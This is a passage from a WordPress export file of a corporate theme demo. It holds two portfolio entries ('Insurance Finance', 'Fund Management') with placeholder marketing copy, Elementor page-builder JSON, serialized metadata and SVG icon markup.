</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.
									</li>
						</ul>
			<h5>02. Solutions</h5>		
		<p>What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation</h6>		
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
			<h5>03. Results</h5>		
		<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.</p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery around their pricing strategy. The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.</p>		
										<img width="606" height="342" src="https://maxbizz.s3.amazonaws.com/images/chart-project-home-4.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart-project-home-4.png 606w, https://maxbizz.s3.amazonaws.com/images/chart-project-home-4-300x169.png 300w" sizes="(max-width: 606px) 100vw, 606px" />											
					<a target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Google-plus-g
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Pinterest-p
											</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>818</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 04:48:06]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 04:48:06]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[insurance-finance]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_portfolio]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="portfolio_cat" nicename="finance"><![CDATA[finance]]></category>
		<category domain="portfolio_cat" nicename="startup"><![CDATA[startup]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[819]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[774]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"927f8df","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"80","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"6791ad66","elType":"column","settings":{"_column_size":50,"_inline_size":65,"_inline_size_tablet":100},"elements":[{"id":"445a200a","elType":"widget","settings":{"editor":"<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it\u2019s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands.<\/p>","drop_cap":"yes","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"5789d963","elType":"column","settings":{"_column_size":50,"_inline_size":35,"_inline_size_tablet":100},"elements":[{"id":"788454d6","elType":"section","settings":{"gap":"extended","structure":"20","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"padding":{"unit":"px","top":"35","right":"20","bottom":"35","left":"20","isLinked":false},"padding_mobile":{"unit":"px","top":"15","right":"15","bottom":"15","left":"15","isLinked":true}},"elements":[{"id":"42dad2ce","elType":"column","settings":{"_column_size":50,"_inline_size":47.8130000000000023874235921539366245269775390625,"_inline_size_mobile":100},"elements":[{"id":"1e8fb8bb","elType":"widget","settings":{"title":"Client:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"bd5ee3e","elType":"widget","settings":{"editor":"<p>OceanThemes<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"25002852","elType":"widget","settings":{"title":"Website:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"1c55a945","elType":"widget","settings":{"editor":"<p>oceanthemes.net<\/p>","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"2736d520","elType":"column","settings":{"_column_size":50,"_inline_size":52.1820000000000021600499167107045650482177734375,"_inline_size_mobile":100},"elements":[{"id":"3616c54e","elType":"widget","settings":{"title":"Date:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"21d1388b","elType":"widget","settings":{"editor":"<p>November 09, 2020<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"55401017","elType":"widget","settings":{"title":"Category:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"16c4f4c6","elType":"widget","settings":{"editor":"<p>Marketing\/Finance<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"307fcf31","elType":"section","settings":{"padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false}},"elements":[{"id":"3b72cfa8","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"434e61f3","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-details.jpg","id":780},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"bf71e31","elType":"section","settings":[],"elements":[{"id":"b05ea27","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"3074667","elType":"widget","settings":{"title":"<span style=\"color:#55bb53\">01.<\/span> \u0421hallenge","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"1c80073","elType":"widget","settings":{"editor":"<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"5ab7dae","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#55BB53","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"ebd31d5","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":45,"sizes":[]},"gap_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"2f013d3","elType":"widget","settings":{"title":"<span style=\"color:#55bb53\">02.<\/span> Solutions","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"69ad255","elType":"widget","settings":{"editor":"<p>What\u2019s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"6059504","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40"},"elements":[{"id":"4cbb2a8","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"776410b","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"9ab4314","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"406cf55","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"f7165a5","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"f6ac0e8","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"7d3c52f","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"af93444","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]},"bar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"489b3f3","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":35,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"a696088","elType":"widget","settings":{"title":"<span style=\"color:#55bb53\">03.<\/span> Results","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"681b270","elType":"section","settings":{"gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width","reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"5f5dff2","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"5db44ad","elType":"widget","settings":{"editor":"<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.<\/p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery <span style=\"color: #55bb53;\">around their pricing strategy.<\/span> The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.<\/p>","_padding":{"unit":"px","top":"0","right":"42","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"044c660","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"77769e5","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-project-home-4.png","id":2064},"image_size":"full","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-15","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true}],"isInner":true},{"id":"13e82ac","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","columns":"4","align":"right","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:11:"text-editor";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:2:{s:6:"editor";i:8;s:8:"drop_cap";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:15:"_padding_mobile";i:3;s:15:"_padding_tablet";i:1;s:8:"_padding";i:5;}}}}s:6:"column";a:3:{s:5:"count";i:12;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:12;s:19:"_inline_size_tablet";i:8;s:19:"_inline_size_mobile";i:6;}}}}s:7:"heading";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:7;s:11:"header_size";i:7;}}s:5:"style";a:1:{s:19:"section_title_style";a:5:{s:11:"title_color";i:4;s:21:"typography_typography";i:4;s:22:"typography_font_family";i:4;s:20:"typography_font_size";i:4;s:22:"typography_font_weight";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:7;}}}}s:7:"section";a:3:{s:5:"count";i:6;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:3:"gap";i:4;s:16:"content_position";i:1;s:6:"layout";i:2;}s:17:"section_structure";a:1:{s:9:"structure";i:4;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:1;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:4;s:14:"padding_mobile";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:2;s:10:"image_size";i:2;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:19:"image_border_radius";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:7:"_margin";i:1;s:14:"_margin_mobile";i:1;s:15:"_padding_tablet";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:1:{s:11:"text_indent";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"divider";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:2;s:3:"gap";i:2;s:10:"gap_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}s:5:"style";a:1:{s:17:"bar_style_section";a:1:{s:9:"bar_color";i:4;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Fund Management</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/fund-management/</link>
		<pubDate>Fri, 11 Sep 2020 07:02:07 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=ot_portfolio&#038;p=822</guid>
		<description></description>
		<content:encoded><![CDATA[<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands.</p>		
			<h6>Client:</h6>		
		<p>OceanThemes</p>		
			<h6>Website:</h6>		
		<p>oceanthemes.net</p>		
			<h6>Date:</h6>		
		<p>October 02, 2020</p>		
			<h6>Category:</h6>		
		<p>Marketing/Finance</p>		
										<img width="1174" height="620" src="https://maxbizz.s3.amazonaws.com/images/project-details.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-details.jpg 1174w, https://maxbizz.s3.amazonaws.com/images/project-details-1-300x158.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-details-1-1024x541.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project-details-1-768x406.jpg 768w" sizes="(max-width: 1174px) 100vw, 1174px" />											
			<h5>01. Сhallenge</h5>		
		<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					<ul>
							<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.
									</li>
						</ul>
			<h5>02. Solutions</h5>		
		<p>What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation</h6>		
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
			<h5>03. Results</h5>		
		<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.</p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery around their pricing strategy. The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.</p>		
										<img width="606" height="342" src="https://maxbizz.s3.amazonaws.com/images/chart-project-home-4.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart-project-home-4.png 606w, https://maxbizz.s3.amazonaws.com/images/chart-project-home-4-300x169.png 300w" sizes="(max-width: 606px) 100vw, 606px" />											
					<a target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Google-plus-g
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Pinterest-p
											</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>822</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:02:07]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:02:07]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[fund-management]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_portfolio]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="portfolio_cat" nicename="finance"><![CDATA[finance]]></category>
		<category domain="portfolio_cat" nicename="startup"><![CDATA[startup]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[823]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[774]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
